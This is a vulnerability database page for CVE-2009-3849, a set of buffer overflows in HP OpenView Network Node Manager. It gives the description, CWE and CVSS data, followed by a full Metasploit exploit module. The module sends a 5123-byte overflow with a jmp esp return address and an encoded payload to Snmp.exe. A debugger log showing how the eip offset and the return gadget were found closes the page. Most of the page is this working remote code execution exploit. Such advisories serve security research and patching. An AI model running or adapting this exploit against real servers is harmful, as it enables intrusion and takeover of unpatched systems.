CVE-2009-3849 Detail

CVE-2009-3849

CVE Descriptions

Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allow remote attackers to execute arbitrary code via (1) a long Template parameter to nnmRptConfig.exe, related to the strcat function; or (2) a long Oid parameter to snmp.exe.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 16780

Publication date : 2010-11-10 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: hp_nnm_snmp.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10998 $', 'References' => [ [ 'CVE', '2009-3849' ], [ 'OSVDB', '60933' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => false, 'Payload' => { 'Space' => 650, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) register_options( [ Opt::RPORT(80) ], self.class ) end def exploit sploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded print_status("Trying target #{target.name}...") send_request_cgi({ 'uri' => "/OvCgi/Main/Snmp.exe", 'method' => "GET", 'data' => "Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp", }, 3) handler end end =begin Search for parameter OidSearch for parameter Debug --not found-- =Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5A d6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2 Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak 9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A o6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2 As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av 9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A z6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2 Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg 9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5B k6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2 Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br 9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5B v6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2 .... Search for parameter Debug --not found-- (db4.db8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=7ffdf000 ecx=00000000 edx=000fa500 esi=00000000 edi=00000000 eip=386f4737 esp=000fcdf4 ebp=6f47366f iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 386f4737 ?? ??? 1:014> !load byakugan [Byakugan] Successfully loaded! 1:014> !pattern_offset 9292 [Byakugan] Control of ebp at offset 5119. [Byakugan] Control of eip at offset 5123. 1:014> s -b 0x5a000000 0x5a06a000 ff e4 5a01d78d ff e4 00 00 83 c4 08 85-c0 75 14 68 18 2f 04 5a .........u.h./.Z 1:014> u 0x5a01d78d L1 ov!OVHelpAPI+0x18d: 5a01d78d ffe4 jmp esp <- jmp esp for 7.53, will update in a sec. =end